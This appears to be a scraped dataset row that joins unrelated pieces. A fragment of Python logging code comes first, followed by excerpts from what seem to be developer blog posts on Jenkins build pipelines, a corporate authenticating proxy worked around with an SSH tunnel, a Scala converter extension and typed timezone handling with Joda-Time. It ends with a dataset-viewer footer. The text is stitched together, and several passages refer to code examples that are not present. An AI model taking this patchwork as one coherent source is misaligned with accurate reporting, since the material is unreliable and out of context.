assert not kwargs or (len(kwargs) == 1 and "hint" in kwargs), \
"Invalid keyword arguments for LogWarning (%s)" % str(kwargs)
if args:
message = message % tuple(args)
if message:
logging.warning(message)
self.Log(" - WARNING: %s" % message)
if "hint" in kwargs:
self.Log(" Hint: %s" % kwargs["hint"])
def LogInfo(self, message, *args):
"""Log an informational message to the logs and the user.
"""
if args:
message = message % tuple(args)
logging.info(message)
self.Log(" - INFO: %s" % message)
def GetECId(self):
"""Returns the current execution context ID.
"""
if not self._ec_id:
raise errors.ProgrammerError("Tried to use execution context id when"
" not set")
return self._ec_id
|
I can't quite believe it but it's actually almost a year since I moved away from an entirely-Cloudbees-based build-and-deploy chain to a far more higgledy-piggledy, yet much more satisfactory, best-of-breed chain.
In that time this setup has built a helluva lot of software, both open-source libraries and closed-source moonlighting apps, and I've learnt a helluva lot too. Time to share.
The pipeline/flow should kick off the instant something is pushed to master. Waiting 59 seconds because we just missed the poll is wasteful. If we're using a modern source-control system, there is absolutely no reason to be periodically polling it for changes. It's the 21st century, last century's batch processing techniques aren't useful here.
The build must begin with a clean to ensure repeatability. Each and every successful build should be appropriately tagged so that the correlation between git commit ID and Jenkins build number is evident.
Things go wrong. Jenkins configurations get accidentally broken. It should be just as easy to roll back a misconfigured job as it is to roll back a bad code change.
Yes the test environment will be volatile, but as long as the tests are good, it should be good-volatile; aka latest-and-greatest. This puts the onus on developers to write comprehensive, meaningful tests. The test environment should be a glittering showcase of all the awesome that is about to hit prod.
No manual funny-business allowed. Repeatable, reliable, and (ideally) rollback-able from the Jenkins UI.
So at my current site the dreaded Authenticating Proxy policy has been instigated - one of those classic corporate network-management patterns that may make sense for the 90% of users with their locked-down Windows/Active Directory/whatever setups, but makes life a miserable hell for those of us playing outside on our Ubuntu boxes.
In a nice display of classic software-developer passive-aggression we've been keeping track of the hours lost due to this change - we're up to 10 person-days since the policy came in 2 months ago. Ouch.
Mainly the problems are due to bits of open-source software that simply haven't had to deal with such proxies - these generally cause things like Jenkins build boxes and other "headless" (or at least "human-less") devices to have horrendous problems.
I got super-tied-up today trying to get one of these build boxes to install something via good-old apt-get in Ubuntu. In the end I used one of my old favourite tricks, the SSH Tunnel backchannel to use the proxy that my dev box has authenticated with, to get the job done.
So in my sausagefactory library, my first attempt at adding an extension mechanism was very Java-esque.
Scala will check whether the userConverter is defined at a given input - if not, it'll fall through to the defaultConverter - perfect.
A userConverter only has to worry about converting one type of thing, and doesn't know (or care) about downstream converters. A simplified Chain of Responsibility.
Following on from my lightbulb moment, I tried to sketch out what I wanted from a strongly-typed system for representing timezoned instants in time.
I'm only a tiny way down the path to true functional-programming enlightenment. Hell, I've only just started looking at Scalaz, mainly thanks to eed3si9n's excellent tutorials.
(*) Everything is immutable (including within Joda-Time) so "adjustments" naturally result in a new object being returned. Do we have a word yet for "A modified copy of an immutable thing"?
I've quite recently become involved in an after-hours project that has a strong temporal component to it. Basically every interaction with the system will need to be labelled with a time, and they will constantly need to be compared and converted. Add to this the fact that the first beta customers are located on opposite sides of the Pacific, and that events can occur in a further 3 European countries, and a way to safely and unambiguously represent the time of something happening in a time and a place seems paramount.
While Joda Time has undoubtedly made date/calendar/timezone manipulation a happier task for the JVM developer, I'm looking for something stronger. I can pass around a DateTime all day long (no pun intended) but until I inspect its TimeZone I can't be sure where it originated from, or if it is in fact the canonical UTC.
val myTime = new DateTime() // Happens to be in "Europe/Paris"
Which will work just fine most of the time, except when there's been an event in the last hour, when we won't see it. Or is it the other way around? Tricky, isn't it?
There's nothing in the type system to prevent these kinds of runtime problems. It comes down to developer diligence in naming/commenting/testing all the things - literally, every thing that uses a representation of time - to ensure correctness.
But hang on, aren't compilers really, really good at ensuring correctness?
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.